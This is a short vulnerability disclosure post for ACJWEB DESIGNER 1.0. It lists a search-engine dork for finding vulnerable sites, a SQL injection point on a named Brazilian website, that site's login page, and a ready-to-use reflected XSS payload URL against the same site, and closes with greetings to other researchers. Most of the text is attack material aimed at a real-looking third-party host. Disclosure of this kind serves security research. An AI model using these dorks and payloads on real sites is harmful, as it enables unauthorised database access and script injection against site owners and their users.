| # Title : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : 1.0
| # Vendor : http://www.meuimovelac.com.br
========================================================================
Drok : inurl:sobre.php?id=
Sql injection :
http://www.asmac.com.br/sobre.php?id= inject her
login = login.php
XSS :
http://www.asmac.com.br/busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt>
Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ =============================